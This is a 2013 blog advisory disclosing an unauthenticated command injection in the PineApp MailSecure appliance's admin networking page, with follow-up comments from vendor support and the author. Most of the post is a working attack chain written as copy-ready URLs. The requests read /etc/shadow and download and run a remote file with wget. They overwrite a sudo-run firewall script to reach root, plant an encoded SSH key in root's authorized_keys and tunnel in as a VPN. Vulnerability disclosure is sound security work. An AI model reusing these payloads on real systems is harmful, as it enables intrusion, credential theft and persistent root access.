martes, 19 de noviembre de 2013

[Advisory] Pineapp MailSecure total pwnage

In February 2013 I send Pineapp the following information:
-----------------------------------------------------------------
It is possible execute any command bash as qmailq unprivilege user, sending only the following https request, without authentication.
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow

To upload any file (script, binary, etc...) it is possible with wget command.
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile

Download and execute it is possible with this request:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/tmp/somefile

Details of bug:
Lines 115-120 of /srv/www/htdocs/admin/confnetworking.html
----------------snip-----------------
$query=explode("\n",shell_exec("/usr/bin/host -t '$nstype' '$hostip' $nsserver"));
foreach ($query as $line)
    if ($line)
    echo preg_replace("/\t/","   ",$line)."
\n";
?>
----------------snip-----------------

Also it is possible make privilege escalation to root with a weak sudoers configuration, on /tmp/rc.firewall file. If you overwrite this file with this content:
---------
#!/bin/bash
$1
---------
you must get a privileged backdoor.
It is possible with the following request:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo '%23!/bin/bash' > /tmp/fileheader
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo '$1' > /tmp/filecode
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;mv /tmp/rc.firewall /tmp/rc.firewall_
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat /tmp/fileheader /tmp/filecode > /tmp/rc.firewall
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod %2bx /tmp/rc.firewall
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm /tmp/fileheader
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm /tmp/filecode

And execute commands as root with:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod %2bx /tmp/rc.firewall 'whoami'

With this, you can sent a private ssh key and get access by ssh service. To perform this you can make the following request:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo '%73%73%68%2d%72%73%61%20%41%41%41%41%42%33%4e%7a%61%43%31%79%63%32%45%41%41%41%41%42%49%77%41%41%41%51%45%41%79%54%6f%4c%32%75%6b%51%36%4c%76%44%6a%78%51%65%4e%55%72%54%59%35%2b%51%66%57%37%47%51%52%4c%51%68%44%4f%69%77%7a%46%48%42%4a%66%33%59%66%49%44%50%6f%74%45%48%41%4d%43%7a%75%45%48%56%72%34%49%2f%41%77%52%73%78%76%4a%44%2b%4e%55%2b%2b%53%65%72%34%76%7a%35%4d%68%53%6c%50%37%64%47%53%78%47%58%39%31%37%7a%4b%53%53%4b%33%79%55%78%33%42%75%46%44%38%49%52%53%46%51%47%35%64%33%75%50%72%46%63%2f%4d%2b%33%61%37%30%4f%7a%45%44%2f%59%71%79%75%53%63%35%64%79%4c%64%67%59%32%61%47%77%6f%48%77%6a%4e%6f%5a%6b%79%65%44%77%72%67%63%2b%50%65%57%66%78%57%37%63%44%39%72%2f%4f%56%6d%38%59%49%61%70%7a%75%34%37%77%65%71%53%70%38%70%37%2b%43%58%4f%45%41%4c%64%2b%50%4e%54%79%4b%30%43%34%7a%51%58%37%72%35%6d%37%79%48%45%34%50%74%31%6f%75%41%43%45%6c%46%56%38%4a%4f%4f%45%38%4c%49%76%38%55%4a%67%57%30%43%64%41%55%4f%48%6a%49%75%2b%5a%6f%6d%35%54%71%50%73%72%6e%70%64%44%4e%59%6e%2b%76%33%6d%33%57%76%4f%50%71%36%66%69%38%61%72%79%53%33%61%4e%6e%7a%53%74%51%4e%5a%61%33%35%50%64%75%42%4a%49%39%33%4e%41%79%4f%48%54%59%54%31%75%56%6a%6c%79%55%51%3d%3d%20%72%75%62%65%6e%40%72%75%62%65%6e%2d%6c%61%70%74%6f%70' > /tmp/key.pub
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo /tmp/rc.firewall 'mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo /tmp/rc.firewall 'cp /root/.ssh/authorized_keys /tmp'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat /tmp/authorized_keys /tmp/key.pub > /tmp/keys.pub
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo /tmp/rc.firewall 'mv /tmp/keys.pub /root/.ssh/authorized_keys'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo /tmp/rc.firewall 'chown root:root /root/.ssh/authorized_keys'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall 'killall sshd'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall 'sshd'

This key have password: '1234'

Now you can get access with ssh as root and up tun interface with the appliance with ssh client:
ssh root@192.168.24.24 -p 7022 -w0:0 -i /home/ruben/key

With this the attacker have a VPN on the same network segment of MailSecure appliance vulnerable.
-----------------------------------------------------------------

This I made a live demo of vulnerability, but don't revealed the manufacturer, then the bugs was not fixed.
http://boken00.blogspot.com.es/2012/11/ii-conferencias-de-seguridad-navaja.html
Video demo will be release soon on my blog.

Version affected:
MailSecure <= 5099SK

Credits:
-----------
Ruben Garrote García
rubengarrote [at] gmail [dot] com
http://boken00.blogspot.com
@Boken_

3 comentarios:

Anónimo dijo...

Dear Sir,

My name is Ronen and I am part of the technical support team at PineApp. I reviewed our mail from February and could not find any message from you. In any event, this security vulnerability is already resolved in our latest revision (3.70 Build 5586).

Best regards,
PineApp support team
support[at]pineapp.com

Boken dijo...

Hi,

I didn't submit via support email. I sent indirectly via CERT.

Regards.

Boken dijo...

And, the bug is not fixed totally. Now, it remains possible escalate privileges to root.

Also there are more command injection vulnerabilities.

Regards.